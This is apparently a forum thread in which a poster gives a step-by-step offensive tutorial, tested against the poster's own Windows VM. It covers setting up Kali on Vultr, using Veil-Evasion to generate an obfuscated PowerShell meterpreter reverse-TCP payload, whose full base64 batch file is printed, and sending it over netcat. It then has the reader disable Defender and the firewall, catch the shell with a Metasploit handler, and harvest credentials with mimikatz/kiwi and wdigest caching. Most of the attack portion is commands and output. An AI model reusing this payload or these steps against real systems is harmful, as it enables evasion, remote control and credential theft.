Deploy Kali Linux on Vultr

[Asphyxia]

Firstly, find the latest ISO for Kali Linux (64-bit) full - this link here should have the latest ISO links.

Register/login to your Vultr account by clicking here.

Navigate to your ISOs tab within Vultr.

Click add at the top right.

Paste in the latest full Kali (x64) e.g. https://cdimage.kali.org/kali-2019.4/kali-linux-2019.4-amd64.iso - click upload.

After waiting a few minutes, go to deploy a new server.

I select New York, $20 plan to have 4GB of RAM and then select "Upload ISO" and select your Kali ISO image.

I gave mine the hostname of veil.

Now open your server within Vultr, at the top there is a terminal icon... click.



I am going to use my arrow keys to tab down to Graphical install.

Walk through Kali installation as normal, you should eventually see:


There is a chance this may take a little while as the system installs by writing disk data.

Once this finished, we are able to go about configuring our Kali environment for safe remote use.

I for example would consider setting up a VPN on a random port and firewall off everything else. Then allow port 22 connections within.

One could have full disk encryption setup, VPN into the system and be using a fairly well encrypted suite of Kali and the included tools for testing security!

I will use a network mirror:


Hell yeah team!!


Now the last part will reboot your Kali system and you should be able to login as root.

Since we have relaunched, you will notice we are back to the initial install screen - this is because we now have to remove the ISO from booting:


Simply go into your server, select Settings, and then Custom ISO - remove the ISO from the server.

Reload your noVNC screen and login to root:


Open a terminal to edit your sshd_config:


Make some important changes:


Now Ctrl+O to save the file! Press enter..

Ctrl+X to exit the file.

Let's start the SSH service now:

service ssh start

Connect to your Kali server with PuTTY now:


Now we know the port is 2237 (from our SSHD config) and the IP is listed above and in our Vultr panel - logging into PuTTY will be simple:


Simply click "Open" at the bottom of PuTTY once highlighted fields are filled in.

Accept the security certificate warning, Yes.

Login to your Kali root account!

I am going to patch my Kali now:

apt update
apt upgrade -y

We are ready to get some awesome shit done now!

 

[Asphyxia]

Part 2:

INSTALLING VEIL-EVASION:

apt -y install veil
/usr/share/veil/config/setup.sh --force --silent

You will now have a bad-fucking-ass Kali server in the cloud ready for penetration testing (pentesting)...



Go to run veil and guess what? Shit is not working guys! This is real life - this happens.



Done!? Done my asshole upside down by knife-wielding pirates.

Well, since nothing is working:

... I found a solution. Apparently when running headless, you need to do this:

ssh -X root@veil -p 2237

Where @veil = the name of your server (hostname) and -p 2237 is that SSHD port we configured.

We basically are connecting to our own server for running the wine-related piece by using the -X portion!
For more on this, read here: https://unix.stackexchange.com/ques...ver-ssh-to-run-graphics-applications-remotely

We are going to kill the wine directory now though:

rm -rf /var/lib/veil/wine

...

OKAY HOLY SHIT MAN I AM MADE. Apparently this has no way of running headless without elitely haxing your own stuff.



During the Wine install and Python stuff, a window is popped and you MUST next through this Python setup.

I clicked next through some stuff, then got more!



Apparently you need the wine and a Windows-based install of Python within Linux for whatever reason.

Long story short, you need to run this thing not headless because Windows will pop for you using Wine.

After clicking through Next > Install > Okay > Finish a bunch of times you will have veil!

You may get another window popping up that some shit went wrong, just re-run the setup another time... 'third time is the charm'.

Holy mother of fuck!



Now for configuring a sample payload:


We have payload generation completed:


Notice the /var/lib...payload.bat - let's go there!

Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

[*] Language: powershell
[*] Payload Module: powershell/meterpreter/rev_tcp
[*] PowerShell doesn't compile, so you just get text
[*] Source code written to: /var/lib/veil/output/source/payload.bat
[*] Metasploit Resource file written to: /var/lib/veil/output/handlers/payload.rc

Hit enter to continue...

Let's run 'exit' in veil to get back to our Linux system shell!

cd /var/lib/veil/output/source/

Very simple and beautiful stuff inside here, let's just cat the file to see what this batch file content appears as!

cat payload.bat

And the result is:

@echo off
if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkXEApC4qa0SDRFBLUPUR6czUC2rHet3XESQ/PvHYPTFkSrqk/H3p0558xlAwHHcOJ70wulLovSWAr9B7QaVb+XLpTyoxmU1VxJAY5yYsAN8T1caromC1+kpSpXp0oZEbZn6xgqqQk2LdYtPkZH/61zbjEnvF0yLHY6Vcu7iuGXcvv1m3Z70qj7Jx7Z+ilwXPQY18nn+TcUBJPaERbpGCmdGPGA5FqEcPrO3eliYdG5UV5IVc+GQxZAywFrYx9ieC/jBW/rEjl8QlxE8X7gtTVkhFFt6K0oIy9w6bnRmo2GeweDtLs/SPuHaa+f7cUwGPQj+A6mokRXSh1BUHJp01Nr88bZS9cuNbdUCwz9eU3oc1bEgRsOZOobFChXGAblG6JHvs+8oP4HvumZJLa4QsuNaGwbbkm/x5xxFnX2G7V6ms0aws3ZyFsvpUIIWSFR9PfkCJ4aJ53XVus4eOzsx934z70eqfzeMdvYaIxg690Zy4ryuMteJOsiDJqvTocV2FwgG3c7ujeOPiCdcaEunPJGzdjIx1wvFEaclXRnWy8gzuWlSJqpQVJgMUd7gXdSS5JGQyAgGecFgv9V6n7Ph0TznytzgfB8Mqq0aCIdJGXuHC1t1QzoOKDh8NUDy+KgTq9Q39Myzjb9LMsYBlnk7ZzfVJpkgenzSppygnYlBbr0U27dMlfNCE1ZNx2EjOf28jRmYbBJd22Pohh+ivDy0W7q7dtjxTjYxA1krzdmQrmlZKIQS0gmKIxewOHBIMu2IiexfNr+AA==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkXEApC4qa0SDRFBLUPUR6czUC2rHet3XESQ/PvHYPTFkSrqk/H3p0558xlAwHHcOJ70wulLovSWAr9B7QaVb+XLpTyoxmU1VxJAY5yYsAN8T1caromC1+kpSpXp0oZEbZn6xgqqQk2LdYtPkZH/61zbjEnvF0yLHY6Vcu7iuGXcvv1m3Z70qj7Jx7Z+ilwXPQY18nn+TcUBJPaERbpGCmdGPGA5FqEcPrO3eliYdG5UV5IVc+GQxZAywFrYx9ieC/jBW/rEjl8QlxE8X7gtTVkhFFt6K0oIy9w6bnRmo2GeweDtLs/SPuHaa+f7cUwGPQj+A6mokRXSh1BUHJp01Nr88bZS9cuNbdUCwz9eU3oc1bEgRsOZOobFChXGAblG6JHvs+8oP4HvumZJLa4QsuNaGwbbkm/x5xxFnX2G7V6ms0aws3ZyFsvpUIIWSFR9PfkCJ4aJ53XVus4eOzsx934z70eqfzeMdvYaIxg690Zy4ryuMteJOsiDJqvTocV2FwgG3c7ujeOPiCdcaEunPJGzdjIx1wvFEaclXRnWy8gzuWlSJqpQVJgMUd7gXdSS5JGQyAgGecFgv9V6n7Ph0TznytzgfB8Mqq0aCIdJGXuHC1t1QzoOKDh8NUDy+KgTq9Q39Myzjb9LMsYBlnk7ZzfVJpkgenzSppygnYlBbr0U27dMlfNCE1ZNx2EjOf28jRmYbBJd22Pohh+ivDy0W7q7dtjxTjYxA1krzdmQrmlZKIQS0gmKIxewOHBIMu2IiexfNr+AA==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")

Simple enough!

 

[Asphyxia]

Part 3 of bullshit episode 1 take 1923434884:
Spinning up a Windows VM for some fun time hacking yourself!

Ready?

Deploy a new Vultr instance:


Name the hostname 'blackveilbrides' - deploy.



btw, while this ~15 minute Windows server install process drags its feet across your face with steel toe boots how about you jam to this awesome music to feel more bad ass than you actually are:

brb.. imma eat some cereal

Edit: Here is another song

I’m going through a stage it’s not a fucking stage I just wanna feel okay
Okay motherfucker now you got my attention

Woop woop - this song is legit af, first time listening just now.

Cool blackveilbrides server is up!



Connect into your server with Remote Desktop.

Get your creds entered in:


A first time connection security certificate (cert) warning will pop, just click Yes.

We need to get that bat file over to your Windows server.



^ Up here, inside your blackveilbrides server open the Server Manager.
Click on "Local Server" on list to left.

Toward right side find IE Enhanced Security Configuration and click the blue "On".

Check Off below Administrators:

Click Ok

Now close IE if you opened it already - open Internet Explorer.
You may use default options (Ok).

Now navigate your blackveilbride server's browser to:

https://github.com/diegocr/netcat/raw/master/nc.exe

You will notice that while downloading, Windows Defender freaks out and makes the file worth 0 bytes which means fucking NO DATA IS THERE.

Get Windows Defender Settings opened:


Turn "Real-time protection" off.

Try downloading https://github.com/diegocr/netcat/raw/master/nc.exe again, this time use Save As to C:\Windows



Make sure to change the folder to C:\Windows


Then simply click save with the name as 'nc' this will save it there as an executable file (exe).

Borrowing from an earlier tutorial, let's use nc to swap files between Linux and Windows.

On your Windows server (blackveilbrides) run this inside of command prompt:

cd %userprofile%\Desktop
nc -l -p 443 > payload.bat

Now on our Linux machine (veil) where we have Kali installed, let's run this:

cd /var/lib/veil/output/source
nc -w 3 45.77.201.151  443 < payload.bat
#replace 45.77.201.151 with your blackveilbrides server IP (Windows target)

You will notice something:

root@veil:/var/lib/veil/output/source# cd /var/lib/veil/output/source
root@veil:/var/lib/veil/output/source#
root@veil:/var/lib/veil/output/source# nc -w 3 45.77.201.151  443 < payload.bat
(UNKNOWN) [45.77.201.151] 443 (https) : Connection timed out
root@veil:/var/lib/veil/output/source#

Well damn, looks like a firewall is blocking access on port 443 within our blackveilbrides Windows server, hmm?

Couple options, we can disable the firewall completely or make an exception.

An attacker is likely to make an exception for the port or process.

On Windows box, open "Windows Firewall with Advanced Security"

On the list to the left, atop right click "Windows Firewall with..."

Click Properties menu item.

Under "Domain Profile" tab set Firewall state to Off
Under "Private Profile" tab set Firewall state to Off
Under "Public Profile" tab set Firewall state to Off
Click Apply
Click OK

Let's try running that Linux; veil command again.

cd /var/lib/veil/output/source
nc -w 3 45.77.201.151  443 < payload.bat
#replace 45.77.201.151 with your blackveilbrides server IP (Windows target)

We now have a payload.bat file on our Windows Desktop - awesome BUT DO NOT RUN THIS YET!

On our Kali system, we need to open a listener for this.

Let's run msfconsole -q...

64.154.38.230 is the IP of veil (our Kali linux attack box/server) and lport is the local port to listen on - 443 is what we set in the payload in Veil Evasion generation so this must match.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 64.154.38.230
set lport 443

This is what my console looks like:

lhost => 64.154.38.230
msf5 exploit(multi/handler) > set lport 443
lport => 443
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     64.154.38.230    yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) >

Now how about we type run?

We should now see:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 64.154.38.230:443

Right click the payload.bat file on our Windows system (blackveilbrides) and Run as administrator.

Nice work, you have a meterpreter session on the Windows server - kick ass. Part 4 coming in a few minutes when I drink some ice water lol

 

[Asphyxia]

Part 4:
LSASSY PANTS Using creds_all, kiwi, mimikatz, wdigest_caching without reboot

This is going to be fun!
I am assuming you still have the above meterpreter session from part 3 if not - well fucking do that again.

Firstly, I am going to get some system and user information:

sysinfo
getuid

Results:

meterpreter > sysinfo
Computer        : BLACKVEILBRIDES
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

How about we get system access since we are an administrator.

getsystem

Result:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

Let's load kiwi:

load kiwi

Try getting credentials:

creds_all

Nothing - ah well!

We need to enable wdigest (caching) of credentials.

Let's place our meterpreter session into the background:

background

Keep in mind I am just guessing the session you placed in the background is session 1, but it could be 2, 3... etc. You should see this on your screen - think with your brain and eyes!

use post/windows/manage/wdigest_caching
set SESSION 1

(run this via run command)

When we log off a user account, processes inside our user session will die. There is something cool called lsass though...

Local Security Authority Subsystem Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system.

Wow, so maybe if we migrated our meterpreter session into this process we would stay alive? Yep.

Simple, let's get back into our session (I'm guessing 1 again):

sessions 1

Now just type shell to get an interactive Windows shell.

Let's find the pid (process ID) for the lsass process on this victim; ourself:

tasklist | findstr "lsass"

Result:

C:\Windows\system32>tasklist | findstr "lsass"
tasklist | findstr "lsass"
lsass.exe                      552 Services                   0     16,500 K

That 552 number, this would be our pid (process ID) for the lsass process, note this down somewhere or memorize it for a minute.

Let's type "exit" to get out of our Windows system shell.



Let's migrate our meterpreter into the lsass process like this:

migrate 552

Well I have bad news, I actually crashed the Windows host.

Linux host:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 64.154.38.230
set lport 443
run

Windows host:
Right click payload.bat and Run as administrator.

I am going to migrate meterpreter to smss.exe instead:

ps

Let's try to migrate and see what happens?

migrate 4

... turns out you actually cannot get "that low". Never know until you try or learn - but always try anyways for fun!

I am choosing to migrate into winlogon.exe instead, in particular I will run:

migrate 480

If that does not work, try:

getsystem

Then (480 is the pid of the lowest pid# winlogon.exe)

migrate 480

Let's load our modules for hijacking passwords:

load kiwi
background

With our session in the background, we will use wdigest_caching - I am guessing the SESSION id you sent to the background is 2 but you may change this to match yourself:

use post/windows/manage/wdigest_caching
set SESSION 2

Now simply type run

Let's get back into our session, eh - again I am guessing 2 is your session ID - to find your list of sessions simply type 'sessions'?

sessions 2

Time to close out of our Remote Desktop Connection and log back into the Windows server via Remote Desktop!

Once we do that, from our Kali/Linux/veil box we need to run:

creds_all

This worked well, but keep in mind that if you run this command twice once the process is migrated - you are HIGHLY likely to fuck the Windows system up.

It could become unstable (crash), reboot the server, or otherwise create plentiful bullshit problems for you like your meterpreter session just becomes unresponsive without showing it died.

This type of attack is more of a one-time-thing, for example run that for a duration of uptime... then run creds_all only when ready to extract credentials quick. Think of this as a one time thing, a silver bullet. Unless you want to keep resetting your sessions/shells and trying to possibly crash the server. If anyone knows a better way, definitely let me know.. this is just for educational/informational purposes!!

Out of complete curiosity, I decided to run the creds_all command twice quickly for a double check:


Notice all my other meterpreter sessions died immediately.

Running the creds_all command is really a silver bullet and only one fires - the second one crashes your plane, get your wdigest_caching placed, wait for some time.. and then creds_all! Neat..

 

[MMilesMM]

Nice proof of concept. Thanks for the work.

 

[Asphyxia]

Nice proof of concept. Thanks for the work.

Thank you for the positive feedback, I will go back through my documentation and prune all of it. Going through this all on my own was kind of a headache because this is a f-ton of tutorials and information put into a single span of time. I figured this all out in a night lmao.